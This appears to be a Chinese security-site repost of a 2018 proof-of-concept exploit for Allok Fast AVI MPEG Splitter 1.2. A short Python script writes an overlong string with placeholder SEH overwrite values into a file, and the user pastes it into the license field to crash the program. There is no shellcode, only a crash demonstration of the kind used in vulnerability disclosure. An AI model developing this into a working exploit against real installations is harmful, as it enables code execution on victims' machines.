Allok Fast AVI MPEG Splitter 1.2 SEH Overwrite

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Allok Fast AVI MPEG Splitter 1.2 SEH Overwrite

来源：spiritedwolf@protonmail.com 作者：Singh 发布时间：2018-08-02

#!/usr/bin/env python

# Exploit Title     : Allok Fast AVI MPEG Splitter 1.2 SEH Overwrite POC 
# Vulnerability Type: SEH Overwrite POC
# Discovery by      : Shubham Singh
# Known As          : Spirited Wolf [Twitter: @Pwsecspirit]
# Email             : spiritedwolf@protonmail.com
# Youtube Channel   : www.youtube.com/c/Pentestingwithspirit 
# Discovey Date     : 01/08/2018
# Software Link     : http://www.alloksoft.com/fast_splitter.htm 
# Tested Version    : 1.2
# Tested on OS      : Windows XP Service Pack 3 x86
# Steps to Reproduce: 
# Run the python exploit.py , Open "exploit.txt" and copy content.
# Open Fast AVI MPEG Splitter , A registration prompt will appear.
# In the License field paste the content of "exploit.txt".
# Press "OK" and B00m Crashed.
#SEH chain of main thread, item 0
# Address=00129B78
# SE handler=43434343
#SEH chain of main thread, item 1
# Address=42424242
# SE handler=*** CORRUPT ENTRY ***
 
buffer = "\x41" * 544
nseh = "\x42\x42\x42\x42"
seh= "\x43\x43\x43\x43" 

exploit = buffer + nseh + seh 
f = open ("exploit.txt", "w")
f.write(exploit)
f.close()

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告